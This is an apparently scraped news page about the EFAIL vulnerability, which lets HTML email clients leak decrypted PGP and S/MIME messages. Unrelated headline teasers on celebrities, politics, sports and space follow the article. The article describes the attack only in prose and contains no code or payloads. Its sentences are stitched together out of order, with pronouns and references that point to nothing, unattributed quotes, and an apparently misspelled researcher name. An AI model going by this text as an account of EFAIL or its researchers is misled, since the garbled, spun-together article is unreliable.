IT&Software

Security Alert: Stop using PGP and S/MIME now!

Security Alert: Stop using PGP and S/MIME now!

The attack, as explained by The Verge, allows "bad actors inject malicious code into intercepted emails, despite encryption protocols created to protect against code injection".

"In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plain text through requested URLs", the researchers write.

It reports that there are two attacks, and both require attackers to first have obtained a target's ciphertext, and that the target is using an HTML email client.

Researchers promised to publish more details tomorrow, Tuesday, May 15.

EFF, the world's biggest digital rights group, which has seen the details, says that such a vulnerability is an "immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages".

The researchers warn that journalists, political activists, and whistleblowers face the most risk from the flaw; for years, PGP has been a go-to tool to secure sensitive emails with a form of end-to-end encryption, with S/MIME acting as an alternative. Researchers are advising users to rely on end-to-end encrypted messaging apps instead, in the meantime.

He argued it wasn't really a vulnerability in the OpenPGP system but rather in email programs that had been designed without appropriate safeguards. The organization provided step-by-step guides explaining how to do just that in Apple Mail, Outlook, and Thunderbird, which are the most popular clients affected by EFAIL. While doing so, the client loads any external content, thus, exfiltrating the plaintext to the attacker.

More news: Samsung Galaxy S10 can get the fingerprint scanner in the screen
More news: Google revamps Google Drive storage plans, introduces Google One
More news: Gas prices remain high for three weeks

Sebastian Schnitzel, who co-authored the research, urged people to disable PGP or S/MIME in their email client until a fix can be issued.

On a website dedicated to the flaw, researchers laid out how attacks would be carried out inside email clients through various code loopholes. While PGP is today owned by Symantec, an open source implementation called GNU Privacy Guard (GPG) has been widely adopted by the security community in a number of contexts, this is referred to as OpenPGP.

Email is no longer a secure communication medium.

"Securely encrypted e-mail remains an important and suitable means of increasing information security", it said in a statement, adding that the flaws which have been discovered can be remedied through patches and proper use.

Direct Exfiltration affects Apple's macOS and iOS Mail clients, as well as Mozilla's Thunderbird, enabling an attacker to send an email that automatically decodes and shares a victim's encrypted message content in a reply.

In this scenario, attackers send a "changed encrypted email" to the victim.


  • Meghan Markle Requests

    Meghan Markle Requests "Understanding" for Father After Royal Wedding No-Show Report

    The palace had announced last week that Thomas Markle and his ex-wife, Doria Ragland , would play important roles in the wedding. Harry and Markle have invited 600 guests to the wedding, which will be followed by a gala reception hosted by the queen.

    N. Korea will never fully give up nuclear weapons: top defector

    He further claimed that North Korea wishes to become a nuclear weapons state under the shield of officially being recognised as a denuclearised state.
    Dozens killed in Gaza as USA  opens Jerusalem embassy

    Dozens killed in Gaza as USA opens Jerusalem embassy

    Even as Palestinians' anger erupted, American and Israeli officials celebrated President Trump's move of the embassy to Jerusalem. She said Jerusalem was an internationally recognised disputed territory and a "fair division" was the only hope of peace.
  • Sunny Monday expected, possible thunderstorms in the evening

    Sunny Monday expected, possible thunderstorms in the evening

    Aside from Monday , the potential for severe weather is too low for any mention by the Storm Prediction Center . For Mother's Day on Sunday , expect mostly cloudy skies with the chance for some showers or sprinkles.
    Overwatch will be free to play this month on Xbox One

    Overwatch will be free to play this month on Xbox One

    In addition, deathmatch will include a new competitive mode that has placement matches, skill rating tiers, and leaderboards. Blizzard said it's also adding more than 50 new items to the game, including eight new legendary skins and three epic skins.
    Oil Prices Steady Amid US Sanctions Against Iran

    Oil Prices Steady Amid US Sanctions Against Iran

    The gap between global and USA oil prices widened as new figures showed that producers in the US are ramping up quickly. OPEC expects non-OPEC supply to expand by 1.72 million bpd this year, which is higher than the growth in global demand.
  • Europa water plume: Another step toward living on a moon

    Europa water plume: Another step toward living on a moon

    Then the Galileo mission reached Europa in 1996, and Kivelson's detections revealed that there was an ocean on another planet. This new analysis adds backing to theories that an ocean of liquid salt water exists below the ice.
    Microsoft Rumored To Work On A New Xbox One Controller

    Microsoft Rumored To Work On A New Xbox One Controller

    In November a year ago , Microsoft chose to join the 21st century by introducing Xbox One gifting options to the Microsoft Store. For Xbox owners, they'll receive a system notification with a message that has a clickable redemption button.
    Warriors control second half to beat Rockets in Game 1: 3 takeaways

    Warriors control second half to beat Rockets in Game 1: 3 takeaways

    The Warriors will be waiting to strike in Game 1, but if the Rockets can win on Monday, it could give them a huge mental lift. Now the Rockets are left to regroup after losing their leg up in the homecourt advantage they worked all season for.
  • Juventus seal seventh straight 'scudetto'

    Juventus seal seventh straight 'scudetto'

    Meanwhile, Maurizio Sarri's Napoli won 2-0 in Sampdoria to give them the meagre consolation of a new club record of 88 points. Nainggolan received two yellow cards in the space of five minutes and left Roma down to 10 men for the final 20 minutes.
    Pep Guardiola tells Manchester City to savour success

    Pep Guardiola tells Manchester City to savour success

    I want to say thank you to the fans, my team-mates, the staff, club and especially to the manager for understanding my situation. Silva has returned to Spain to be with his young child, who was born prematurely earlier in the season.
    How to watch a lost Pyramid-size asteroid buzz by Earth

    How to watch a lost Pyramid-size asteroid buzz by Earth

    It can be inferred from this that the asteroid would pass somewhere midway in between the moon and the Earth . Astronomers hope to further observe asteroid 2010 WC9 in order to better refine its orbit .